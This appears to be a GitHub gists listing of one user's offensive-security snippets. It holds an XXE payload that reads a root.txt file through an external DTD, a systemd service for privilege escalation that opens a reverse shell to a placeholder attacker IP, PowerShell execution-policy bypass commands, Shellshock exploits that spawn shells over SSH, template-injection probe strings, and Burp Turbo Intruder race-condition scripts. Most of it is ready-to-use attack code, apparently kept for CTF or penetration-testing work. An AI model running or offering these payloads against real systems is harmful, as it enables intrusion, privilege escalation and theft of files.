Adithyan AK adithyan-ak
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'file:///C:/Users/Administrator/Desktop/root.txt'>"> | |
| Payload : | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml"> | |
| %sp; | |
| %param1; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Very simple HTTP server in python for logging requests | |
| Usage:: | |
| ./server.py [<port>] | |
| """ | |
| from http.server import BaseHTTPRequestHandler, HTTPServer | |
| import logging | |
| class S(BaseHTTPRequestHandler): |
adithyan-ak
/ root.service
Last active
April 24, 2021 07:40
Systemctl Privilege Escalation by creating a malicious service file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Unit] | |
| Description=Systemctl Privesc | |
| [Service] | |
| Type=simple | |
| User=root | |
| ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1' | |
| [Install] | |
| WantedBy=multi-user.target |
adithyan-ak
/ xscreenshot.sh
Created
April 22, 2021 17:56
xscreensaver to get tcpdump to work without needing root
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # credits : @taviso | |
| # You can use xscreensaver to get tcpdump to work without needing root. | |
| # | |
| tmpdir=$(mktemp -d) | |
| cat << EOF > ${tmpdir}/sock.c | |
| #include <unistd.h> | |
| #include <stdio.h> |
adithyan-ak
/ PowershellBypass.ps1
Created
April 25, 2021 07:39
Bypass the PowerShell Execution Policy Restrictions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/ | |
| powershell.exe -ExecutionPolicy Bypass | |
| PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1 | |
| PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1 | |
| PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1 | |
| Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile - | |
| powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA | |
| Set-ExecutionPolicy Bypass -Scope Process |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Shellshock PoC | |
| env x='() { :;}; echo vulnerable' bash -c "echo this is a test" | |
| # executing arbitrary commands by exploiting SSH via shellshock | |
| ssh [email protected] '() { :;}; whoami' | |
| # spwan bash shell by exploiting SSH via shellshock | |
| ssh [email protected] '() { :;}; /bin/bash' | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {{2*2}}[[3*3]] | |
| {{3*3}} | |
| {{3*'3'}} | |
| <%= 3 * 3 %> | |
| ${6*6} | |
| ${{3*3}} | |
| @(6+5) | |
| #{3*3} | |
| #{ 3 * 3 } | |
| {{dump(app)}} |
adithyan-ak
/ race.py
Created
July 4, 2021 12:52
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Test: %s | |
| def queueRequests(target, wordlists): | |
| engine = RequestEngine(endpoint=target.endpoint, | |
| concurrentConnections=30, | |
| requestsPerConnection=100, | |
| pipeline=False | |
| ) | |
| # the 'gate' argument blocks the final byte of each request until openGate is invoked |
adithyan-ak
/ Custom wordlist
Created
July 5, 2021 17:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def queueRequests(target, wordlists): | |
| engine = RequestEngine(endpoint=target.endpoint, | |
| concurrentConnections=5, | |
| requestsPerConnection=100, | |
| pipeline=False | |
| ) | |
| # regular wordlist | |
| for line in open('C:\wordlist.txt'): | |
| engine.queue(target.req, line.rstrip()) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget https://bootstrap.pypa.io/pip/2.7/get-pip.py | |
| sudo python2 get-pip.py | |
| # upgrade setup tools to avoid "invalid command egg_info" error | |
| pip2 install --upgrade setuptools | |
| # install python-dev to avoid "x86_64-linux-gnu-gcc failed..." error | |
| sudo apt-get install python-dev |
OlderNewer